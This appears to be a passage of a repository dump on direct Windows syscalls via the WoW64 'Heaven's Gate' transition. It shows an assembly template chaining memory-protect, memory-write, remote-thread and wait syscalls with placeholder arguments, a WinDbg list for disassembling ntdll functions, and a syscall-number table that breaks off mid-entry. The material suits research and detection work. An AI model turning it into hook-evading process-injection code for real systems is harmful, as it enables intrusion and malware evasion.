push 0x00000000 ; PULONG OldAccessProtection
push 0x00000000 ; ULONG NewAccessProtection
push 0x00000000 ; PULONG NumberOfBytesToProtect
push 0x00000000 ; PVOID *BaseAddress
push 0x00000000 ; HANDLE ProcessHandle
mov eax, [edi+0xc] ; NtProtectVirtualMemory syscall
call ourSyscall
mov edi, [esp+0x14]
push edi
push 0x00000000 ; PULONG NumberOfBytesWritten
push 0x00000000 ; ULONG NumberOfBytesToWrite
push 0x00000000 ; PVOID Buffer
push 0x00000000 ; PVOID BaseAddress
push 0x00000000 ; HANDLE ProcessHandle
mov eax, [edi+0x8] ; NtWriteVirtualMemory syscall
call ourSyscall
mov edi, [esp+0x14]
push edi
push 0x00000000 ; PVOID AttributeList
push 0x00000000 ; ULONG MaximumStackSize
push 0x00000000 ; ULONG StackSize
push 0x00000000 ; ULONG ZeroBits
push 0x00000000 ; ULONG CreateFlags
push 0x00000000 ; PVOID Argument
push 0x00000000 ; PVOID StartR__OUTine
push 0x00000000 ; HANDLE ProcessHandle
push 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes
push 0x00000000 ; ACCESS_MASK DesiredAccess
push 0x00000000 ; PHANDLE ThreadHandle
mov eax, [edi+0x4] ; NtCreateThreadEx syscall
call ourSyscall
mov edi, [esp+0x2c]
push edi
push 0x00000000 ; PLARGE_INTEGER TimeOut
push 0x00000000 ; BOOLEAN Alertable
push 0x00000000 ; HANDLE ObjectHandle
mov eax, [edi] ; NtWaitForSingleObject syscall
call ourSyscall
mov edi, [esp+0xc]
jmp end
ourSyscall: ; Syscall Function
push 0x33 ; Push 0x33 selector for 64-bit
call nextRetf ; GetPC
nextRetf:
add [esp], 5 ; Create destination for Heaven's gate
retf ; Invoke Heaven's gate--transition to x64 code
db 0x49,0x87,0xe6,0x45,0x8b,0x06,0x49,0x83,0xc6,0x04,0x45,0x89,0x45,0x3c,0x45,0x89,0x75,0x48,0x49,
0x83,0xee,0x04,0x4d,0x8d,0x5e,0x04,0x41,0x89,0x7d,0x20,0x41,0x89,0x75,0x24,0x41,0x89,0x5d,0x28,0x41,
0x89,0x6d,0x38,0x9c,0x41,0x58,0x45,0x89,0x45,0x44,0x89,0xc1,0xc1,0xe9,0x10,0x41,0xff,0x24,0xcf
; x64 code as bytes, leading to syscall
; xchg rsp,r14
; mov r8d,dword ptr [r14]
; add r14,4
; mov dword ptr [r13+3Ch],r8d # Save x86 EIP
; mov dword ptr [r13+48h],r14d # Save x86 ESP
; sub r14,4
; lea r11,[r14+4] # Pointer to syscall args
; mov dword ptr [r13+20h],edi # Save 32-bit registers
; mov dword ptr [r13+24h],esi # into WOW64_CONTEXT
; mov dword ptr [r13+28h],ebx
; mov dword ptr [r13+38h],ebp
; pushfq
; pop r8 # Save x86 EFlags
; mov dword ptr [r13+44h],r8d
; mov ecx,eax
; shr ecx,10h # Get TurboThunk, if needed
; jmp qword ptr [r15+rcx*8]
end:
nop
================================================
FILE: start/WinDbgList.txt
================================================
winDbgList
u ntdll!NtAccessCheck L2
u ntdll!NtAccessCheckAndAuditAlarm L2
u ntdll!NtAccessCheckByType L2
u ntdll!NtAccessCheckByTypeAndAuditAlarm L2
u ntdll!NtAccessCheckByTypeResultList L2
u ntdll!NtAccessCheckByTypeResultListAndAuditAlarm L2
u ntdll!NtAccessCheckByTypeResultListAndAuditAlarmByHandle L2
u ntdll!NtAcquireCrossVmMutant L2
u ntdll!NtAcquireProcessActivityReference L2
u ntdll!NtAddAtom L2
u ntdll!NtAddAtomEx L2
u ntdll!NtAddBootEntry L2
u ntdll!NtAddDriverEntry L2
u ntdll!NtAdjustGroupsToken L2
u ntdll!NtAdjustPrivilegesToken L2
u ntdll!NtAdjustTokenClaimsAndDeviceGroups L2
u ntdll!NtAlertResumeThread L2
u ntdll!NtAlertThread L2
u ntdll!NtAlertThreadByThreadId L2
u ntdll!NtAllocateLocallyUniqueId L2
u ntdll!NtAllocateReserveObject L2
u ntdll!NtAllocateUserPhysicalPages L2
u ntdll!NtAllocateUserPhysicalPagesEx L2
u ntdll!NtAllocateUuids L2
u ntdll!NtAllocateVirtualMemory L2
u ntdll!NtAllocateVirtualMemoryEx L2
u ntdll!NtAlpcAcceptConnectPort L2
u ntdll!NtAlpcCancelMessage L2
u ntdll!NtAlpcConnectPort L2
u ntdll!NtAlpcConnectPortEx L2
u ntdll!NtAlpcCreatePort L2
u ntdll!NtAlpcCreatePortSection L2
u ntdll!NtAlpcCreateResourceReserve L2
u ntdll!NtAlpcCreateSectionView L2
u ntdll!NtAlpcCreateSecurityContext L2
u ntdll!NtAlpcDeletePortSection L2
u ntdll!NtAlpcDeleteResourceReserve L2
u ntdll!NtAlpcDeleteSectionView L2
u ntdll!NtAlpcDeleteSecurityContext L2
u ntdll!NtAlpcDisconnectPort L2
u ntdll!NtAlpcImpersonateClientContainerOfPort L2
u ntdll!NtAlpcImpersonateClientOfPort L2
u ntdll!NtAlpcOpenSenderProcess L2
u ntdll!NtAlpcOpenSenderThread L2
u ntdll!NtAlpcQueryInformation L2
u ntdll!NtAlpcQueryInformationMessage L2
u ntdll!NtAlpcRevokeSecurityContext L2
u ntdll!NtAlpcSendWaitReceivePort L2
u ntdll!NtAlpcSetInformation L2
u ntdll!NtApphelpCacheControl L2
u ntdll!NtAreMappedFilesTheSame L2
u ntdll!NtAssignProcessToJobObject L2
u ntdll!NtAssociateWaitCompletionPacket L2
u ntdll!NtCallEnclave L2
u ntdll!NtCallbackReturn L2
u ntdll!NtCancelIoFile L2
u ntdll!NtCancelIoFileEx L2
u ntdll!NtCancelSynchronousIoFile L2
u ntdll!NtCancelTimer L2
u ntdll!NtCancelTimer2 L2
u ntdll!NtCancelWaitCompletionPacket L2
u ntdll!NtChangeProcessState L2
u ntdll!NtChangeThreadState L2
u ntdll!NtClearEvent L2
u ntdll!NtClose L2
u ntdll!NtCloseObjectAuditAlarm L2
u ntdll!NtCommitComplete L2
u ntdll!NtCommitEnlistment L2
u ntdll!NtCommitRegistryTransaction L2
u ntdll!NtCommitTransaction L2
u ntdll!NtCompactKeys L2
u ntdll!NtCompareObjects L2
u ntdll!NtCompareSigningLevels L2
u ntdll!NtCompareTokens L2
u ntdll!NtCompleteConnectPort L2
u ntdll!NtCompressKey L2
u ntdll!NtConnectPort L2
u ntdll!NtContinue L2
u ntdll!NtContinueEx L2
u ntdll!NtConvertBetweenAuxiliaryCounterAndPerformanceCounter L2
u ntdll!NtCreateCrossVmEvent L2
u ntdll!NtCreateCrossVmMutant L2
u ntdll!NtCreateDebugObject L2
u ntdll!NtCreateDirectoryObject L2
u ntdll!NtCreateDirectoryObjectEx L2
u ntdll!NtCreateEnclave L2
u ntdll!NtCreateEnlistment L2
u ntdll!NtCreateEvent L2
u ntdll!NtCreateEventPair L2
u ntdll!NtCreateFile L2
u ntdll!NtCreateIRTimer L2
u ntdll!NtCreateIoCompletion L2
u ntdll!NtCreateIoRing L2
u ntdll!NtCreateJobObject L2
u ntdll!NtCreateJobSet L2
u ntdll!NtCreateKey L2
u ntdll!NtCreateKeyTransacted L2
u ntdll!NtCreateKeyedEvent L2
u ntdll!NtCreateLowBoxToken L2
u ntdll!NtCreateMailslotFile L2
u ntdll!NtCreateMutant L2
u ntdll!NtCreateNamedPipeFile L2
u ntdll!NtCreatePagingFile L2
u ntdll!NtCreatePartition L2
u ntdll!NtCreatePort L2
u ntdll!NtCreatePrivateNamespace L2
u ntdll!NtCreateProcess L2
u ntdll!NtCreateProcessEx L2
u ntdll!NtCreateProcessStateChange L2
u ntdll!NtCreateProfile L2
u ntdll!NtCreateProfileEx L2
u ntdll!NtCreateRegistryTransaction L2
u ntdll!NtCreateResourceManager L2
u ntdll!NtCreateSection L2
u ntdll!NtCreateSectionEx L2
u ntdll!NtCreateSemaphore L2
u ntdll!NtCreateSymbolicLinkObject L2
u ntdll!NtCreateThread L2
u ntdll!NtCreateThreadEx L2
u ntdll!NtCreateThreadStateChange L2
u ntdll!NtCreateTimer L2
u ntdll!NtCreateTimer2 L2
u ntdll!NtCreateToken L2
u ntdll!NtCreateTokenEx L2
u ntdll!NtCreateTransaction L2
u ntdll!NtCreateTransactionManager L2
u ntdll!NtCreateUserProcess L2
u ntdll!NtCreateWaitCompletionPacket L2
u ntdll!NtCreateWaitablePort L2
u ntdll!NtCreateWnfStateName L2
u ntdll!NtCreateWorkerFactory L2
u ntdll!NtDebugActiveProcess L2
u ntdll!NtDebugContinue L2
u ntdll!NtDelayExecution L2
u ntdll!NtDeleteAtom L2
u ntdll!NtDeleteBootEntry L2
u ntdll!NtDeleteDriverEntry L2
u ntdll!NtDeleteFile L2
u ntdll!NtDeleteKey L2
u ntdll!NtDeleteObjectAuditAlarm L2
u ntdll!NtDeletePrivateNamespace L2
u ntdll!NtDeleteValueKey L2
u ntdll!NtDeleteWnfStateData L2
u ntdll!NtDeleteWnfStateName L2
u ntdll!NtDeviceIoControlFile L2
u ntdll!NtDirectGraphicsCall L2
u ntdll!NtDisableLastKnownGood L2
u ntdll!NtDisplayString L2
u ntdll!NtDrawText L2
u ntdll!NtDuplicateObject L2
u ntdll!NtDuplicateToken L2
u ntdll!NtEnableLastKnownGood L2
u ntdll!NtEnumerateBootEntries L2
u ntdll!NtEnumerateDriverEntries L2
u ntdll!NtEnumerateKey L2
u ntdll!NtEnumerateSystemEnvironmentValuesEx L2
u ntdll!NtEnumerateTransactionObject L2
u ntdll!NtEnumerateValueKey L2
u ntdll!NtExtendSection L2
u ntdll!NtFilterBootOption L2
u ntdll!NtFilterToken L2
u ntdll!NtFilterTokenEx L2
u ntdll!NtFindAtom L2
u ntdll!NtFlushBuffersFile L2
u ntdll!NtFlushBuffersFileEx L2
u ntdll!NtFlushInstallUILanguage L2
u ntdll!NtFlushInstructionCache L2
u ntdll!NtFlushKey L2
u ntdll!NtFlushProcessWriteBuffers L2
u ntdll!NtFlushVirtualMemory L2
u ntdll!NtFlushWriteBuffer L2
u ntdll!NtFreeUserPhysicalPages L2
u ntdll!NtFreeVirtualMemory L2
u ntdll!NtFreezeRegistry L2
u ntdll!NtFreezeTransactions L2
u ntdll!NtFsControlFile L2
u ntdll!NtGetCachedSigningLevel L2
u ntdll!NtGetCompleteWnfStateSubscription L2
u ntdll!NtGetContextThread L2
u ntdll!NtGetCurrentProcessorNumber L2
u ntdll!NtGetCurrentProcessorNumberEx L2
u ntdll!NtGetDevicePowerState L2
u ntdll!NtGetMUIRegistryInfo L2
u ntdll!NtGetNextProcess L2
u ntdll!NtGetNextThread L2
u ntdll!NtGetNlsSectionPtr L2
u ntdll!NtGetNotificationResourceManager L2
u ntdll!NtGetWriteWatch L2
u ntdll!NtImpersonateAnonymousToken L2
u ntdll!NtImpersonateClientOfPort L2
u ntdll!NtImpersonateThread L2
u ntdll!NtInitializeEnclave L2
u ntdll!NtInitializeNlsFiles L2
u ntdll!NtInitializeRegistry L2
u ntdll!NtInitiatePowerAction L2
u ntdll!NtIsProcessInJob L2
u ntdll!NtIsSystemResumeAutomatic L2
u ntdll!NtIsUILanguageComitted L2
u ntdll!NtListenPort L2
u ntdll!NtLoadDriver L2
u ntdll!NtLoadEnclaveData L2
u ntdll!NtLoadKey L2
u ntdll!NtLoadKey2 L2
u ntdll!NtLoadKey3 L2
u ntdll!NtLoadKeyEx L2
u ntdll!NtLockFile L2
u ntdll!NtLockProductActivationKeys L2
u ntdll!NtLockRegistryKey L2
u ntdll!NtLockVirtualMemory L2
u ntdll!NtMakePermanentObject L2
u ntdll!NtMakeTemporaryObject L2
u ntdll!NtManageHotPatch L2
u ntdll!NtManagePartition L2
u ntdll!NtMapCMFModule L2
u ntdll!NtMapUserPhysicalPages L2
u ntdll!NtMapUserPhysicalPagesScatter L2
u ntdll!NtMapViewOfSection L2
u ntdll!NtMapViewOfSectionEx L2
u ntdll!NtModifyBootEntry L2
u ntdll!NtModifyDriverEntry L2
u ntdll!NtNotifyChangeDirectoryFile L2
u ntdll!NtNotifyChangeDirectoryFileEx L2
u ntdll!NtNotifyChangeKey L2
u ntdll!NtNotifyChangeMultipleKeys L2
u ntdll!NtNotifyChangeSession L2
u ntdll!NtOpenDirectoryObject L2
u ntdll!NtOpenEnlistment L2
u ntdll!NtOpenEvent L2
u ntdll!NtOpenEventPair L2
u ntdll!NtOpenFile L2
u ntdll!NtOpenIoCompletion L2
u ntdll!NtOpenJobObject L2
u ntdll!NtOpenKey L2
u ntdll!NtOpenKeyEx L2
u ntdll!NtOpenKeyTransacted L2
u ntdll!NtOpenKeyTransactedEx L2
u ntdll!NtOpenKeyedEvent L2
u ntdll!NtOpenMutant L2
u ntdll!NtOpenObjectAuditAlarm L2
u ntdll!NtOpenPartition L2
u ntdll!NtOpenPrivateNamespace L2
u ntdll!NtOpenProcess L2
u ntdll!NtOpenProcessToken L2
u ntdll!NtOpenProcessTokenEx L2
u ntdll!NtOpenRegistryTransaction L2
u ntdll!NtOpenResourceManager L2
u ntdll!NtOpenSection L2
u ntdll!NtOpenSemaphore L2
u ntdll!NtOpenSession L2
u ntdll!NtOpenSymbolicLinkObject L2
u ntdll!NtOpenThread L2
u ntdll!NtOpenThreadToken L2
u ntdll!NtOpenThreadTokenEx L2
u ntdll!NtOpenTimer L2
u ntdll!NtOpenTransaction L2
u ntdll!NtOpenTransactionManager L2
u ntdll!NtPlugPlayControl L2
u ntdll!NtPowerInformation L2
u ntdll!NtPrePrepareComplete L2
u ntdll!NtPrePrepareEnlistment L2
u ntdll!NtPrepareComplete L2
u ntdll!NtPrepareEnlistment L2
u ntdll!NtPrivilegeCheck L2
u ntdll!NtPrivilegeObjectAuditAlarm L2
u ntdll!NtPrivilegedServiceAuditAlarm L2
u ntdll!NtPropagationComplete L2
u ntdll!NtPropagationFailed L2
u ntdll!NtProtectVirtualMemory L2
u ntdll!NtPssCaptureVaSpaceBulk L2
u ntdll!NtPulseEvent L2
u ntdll!NtQueryAttributesFile L2
u ntdll!NtQueryAuxiliaryCounterFrequency L2
u ntdll!NtQueryBootEntryOrder L2
u ntdll!NtQueryBootOptions L2
u ntdll!NtQueryDebugFilterState L2
u ntdll!NtQueryDefaultLocale L2
u ntdll!NtQueryDefaultUILanguage L2
u ntdll!NtQueryDirectoryFile L2
u ntdll!NtQueryDirectoryFileEx L2
u ntdll!NtQueryDirectoryObject L2
u ntdll!NtQueryDriverEntryOrder L2
u ntdll!NtQueryEaFile L2
u ntdll!NtQueryEvent L2
u ntdll!NtQueryFullAttributesFile L2
u ntdll!NtQueryInformationAtom L2
u ntdll!NtQueryInformationByName L2
u ntdll!NtQueryInformationEnlistment L2
u ntdll!NtQueryInformationFile L2
u ntdll!NtQueryInformationJobObject L2
u ntdll!NtQueryInformationPort L2
u ntdll!NtQueryInformationProcess L2
u ntdll!NtQueryInformationResourceManager L2
u ntdll!NtQueryInformationThread L2
u ntdll!NtQueryInformationToken L2
u ntdll!NtQueryInformationTransaction L2
u ntdll!NtQueryInformationTransactionManager L2
u ntdll!NtQueryInformationWorkerFactory L2
u ntdll!NtQueryInstallUILanguage L2
u ntdll!NtQueryIntervalProfile L2
u ntdll!NtQueryIoCompletion L2
u ntdll!NtQueryIoRingCapabilities L2
u ntdll!NtQueryKey L2
u ntdll!NtQueryLicenseValue L2
u ntdll!NtQueryMultipleValueKey L2
u ntdll!NtQueryMutant L2
u ntdll!NtQueryObject L2
u ntdll!NtQueryOpenSubKeys L2
u ntdll!NtQueryOpenSubKeysEx L2
u ntdll!NtQueryPerformanceCounter L2
u ntdll!NtQueryPortInformationProcess L2
u ntdll!NtQueryQuotaInformationFile L2
u ntdll!NtQuerySection L2
u ntdll!NtQuerySecurityAttributesToken L2
u ntdll!NtQuerySecurityObject L2
u ntdll!NtQuerySecurityPolicy L2
u ntdll!NtQuerySemaphore L2
u ntdll!NtQuerySymbolicLinkObject L2
u ntdll!NtQuerySystemEnvironmentValue L2
u ntdll!NtQuerySystemEnvironmentValueEx L2
u ntdll!NtQuerySystemInformation L2
u ntdll!NtQuerySystemInformationEx L2
u ntdll!NtQueryTimer L2
u ntdll!NtQueryTimerResolution L2
u ntdll!NtQueryValueKey L2
u ntdll!NtQueryVirtualMemory L2
u ntdll!NtQueryVolumeInformationFile L2
u ntdll!NtQueryWnfStateData L2
u ntdll!NtQueryWnfStateNameInformation L2
u ntdll!NtQueueApcThread L2
u ntdll!NtQueueApcThreadEx L2
u ntdll!NtQueueApcThreadEx2 L2
u ntdll!NtRaiseException L2
u ntdll!NtRaiseHardError L2
u ntdll!NtReadFile L2
u ntdll!NtReadFileScatter L2
u ntdll!NtReadOnlyEnlistment L2
u ntdll!NtReadRequestData L2
u ntdll!NtReadVirtualMemory L2
u ntdll!NtReadVirtualMemoryEx L2
u ntdll!NtRecoverEnlistment L2
u ntdll!NtRecoverResourceManager L2
u ntdll!NtRecoverTransactionManager L2
u ntdll!NtRegisterProtocolAddressInformation L2
u ntdll!NtRegisterThreadTerminatePort L2
u ntdll!NtReleaseKeyedEvent L2
u ntdll!NtReleaseMutant L2
u ntdll!NtReleaseSemaphore L2
u ntdll!NtReleaseWorkerFactoryWorker L2
u ntdll!NtRemoveIoCompletion L2
u ntdll!NtRemoveIoCompletionEx L2
u ntdll!NtRemoveProcessDebug L2
u ntdll!NtRenameKey L2
u ntdll!NtRenameTransactionManager L2
u ntdll!NtReplaceKey L2
u ntdll!NtReplacePartitionUnit L2
u ntdll!NtReplyPort L2
u ntdll!NtReplyWaitReceivePort L2
u ntdll!NtReplyWaitReceivePortEx L2
u ntdll!NtReplyWaitReplyPort L2
u ntdll!NtRequestPort L2
u ntdll!NtRequestWaitReplyPort L2
u ntdll!NtResetEvent L2
u ntdll!NtResetWriteWatch L2
u ntdll!NtRestoreKey L2
u ntdll!NtResumeProcess L2
u ntdll!NtResumeThread L2
u ntdll!NtRevertContainerImpersonation L2
u ntdll!NtRollbackComplete L2
u ntdll!NtRollbackEnlistment L2
u ntdll!NtRollbackRegistryTransaction L2
u ntdll!NtRollbackTransaction L2
u ntdll!NtRollforwardTransactionManager L2
u ntdll!NtSaveKey L2
u ntdll!NtSaveKeyEx L2
u ntdll!NtSaveMergedKeys L2
u ntdll!NtSecureConnectPort L2
u ntdll!NtSerializeBoot L2
u ntdll!NtSetBootEntryOrder L2
u ntdll!NtSetBootOptions L2
u ntdll!NtSetCachedSigningLevel L2
u ntdll!NtSetCachedSigningLevel2 L2
u ntdll!NtSetContextThread L2
u ntdll!NtSetDebugFilterState L2
u ntdll!NtSetDefaultHardErrorPort L2
u ntdll!NtSetDefaultLocale L2
u ntdll!NtSetDefaultUILanguage L2
u ntdll!NtSetDriverEntryOrder L2
u ntdll!NtSetEaFile L2
u ntdll!NtSetEvent L2
u ntdll!NtSetEventBoostPriority L2
u ntdll!NtSetHighEventPair L2
u ntdll!NtSetHighWaitLowEventPair L2
u ntdll!NtSetIRTimer L2
u ntdll!NtSetInformationDebugObject L2
u ntdll!NtSetInformationEnlistment L2
u ntdll!NtSetInformationFile L2
u ntdll!NtSetInformationIoRing L2
u ntdll!NtSetInformationJobObject L2
u ntdll!NtSetInformationKey L2
u ntdll!NtSetInformationObject L2
u ntdll!NtSetInformationProcess L2
u ntdll!NtSetInformationResourceManager L2
u ntdll!NtSetInformationSymbolicLink L2
u ntdll!NtSetInformationThread L2
u ntdll!NtSetInformationToken L2
u ntdll!NtSetInformationTransaction L2
u ntdll!NtSetInformationTransactionManager L2
u ntdll!NtSetInformationVirtualMemory L2
u ntdll!NtSetInformationWorkerFactory L2
u ntdll!NtSetIntervalProfile L2
u ntdll!NtSetIoCompletion L2
u ntdll!NtSetIoCompletionEx L2
u ntdll!NtSetLdtEntries L2
u ntdll!NtSetLowEventPair L2
u ntdll!NtSetLowWaitHighEventPair L2
u ntdll!NtSetQuotaInformationFile L2
u ntdll!NtSetSecurityObject L2
u ntdll!NtSetSystemEnvironmentValue L2
u ntdll!NtSetSystemEnvironmentValueEx L2
u ntdll!NtSetSystemInformation L2
u ntdll!NtSetSystemPowerState L2
u ntdll!NtSetSystemTime L2
u ntdll!NtSetThreadExecutionState L2
u ntdll!NtSetTimer L2
u ntdll!NtSetTimer2 L2
u ntdll!NtSetTimerEx L2
u ntdll!NtSetTimerResolution L2
u ntdll!NtSetUuidSeed L2
u ntdll!NtSetValueKey L2
u ntdll!NtSetVolumeInformationFile L2
u ntdll!NtSetWnfProcessNotificationEvent L2
u ntdll!NtShutdownSystem L2
u ntdll!NtShutdownWorkerFactory L2
u ntdll!NtSignalAndWaitForSingleObject L2
u ntdll!NtSinglePhaseReject L2
u ntdll!NtStartProfile L2
u ntdll!NtStopProfile L2
u ntdll!NtSubmitIoRing L2
u ntdll!NtSubscribeWnfStateChange L2
u ntdll!NtSuspendProcess L2
u ntdll!NtSuspendThread L2
u ntdll!NtSystemDebugControl L2
u ntdll!NtTerminateEnclave L2
u ntdll!NtTerminateJobObject L2
u ntdll!NtTerminateProcess L2
u ntdll!NtTerminateThread L2
u ntdll!NtTestAlert L2
u ntdll!NtThawRegistry L2
u ntdll!NtThawTransactions L2
u ntdll!NtTraceControl L2
u ntdll!NtTraceEvent L2
u ntdll!NtTranslateFilePath L2
u ntdll!NtUmsThreadYield L2
u ntdll!NtUnloadDriver L2
u ntdll!NtUnloadKey L2
u ntdll!NtUnloadKey2 L2
u ntdll!NtUnloadKeyEx L2
u ntdll!NtUnlockFile L2
u ntdll!NtUnlockVirtualMemory L2
u ntdll!NtUnmapViewOfSection L2
u ntdll!NtUnmapViewOfSectionEx L2
u ntdll!NtUnsubscribeWnfStateChange L2
u ntdll!NtUpdateWnfStateData L2
u ntdll!NtVdmControl L2
u ntdll!NtWaitForAlertByThreadId L2
u ntdll!NtWaitForDebugEvent L2
u ntdll!NtWaitForKeyedEvent L2
u ntdll!NtWaitForMultipleObjects L2
u ntdll!NtWaitForMultipleObjects32 L2
u ntdll!NtWaitForSingleObject L2
u ntdll!NtWaitForWorkViaWorkerFactory L2
u ntdll!NtWaitHighEventPair L2
u ntdll!NtWaitLowEventPair L2
u ntdll!NtWorkerFactoryWorkerReady L2
u ntdll!NtWriteFile L2
u ntdll!NtWriteFileGather L2
u ntdll!NtWriteRequestData L2
u ntdll!NtWriteVirtualMemory L2
u ntdll!NtYieldExecution L2
u ntdll!RtlGetNativeSystemInformation L2
================================================
FILE: start/WinSysCalls.json
================================================
{"Windows XP": {"SP1": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": 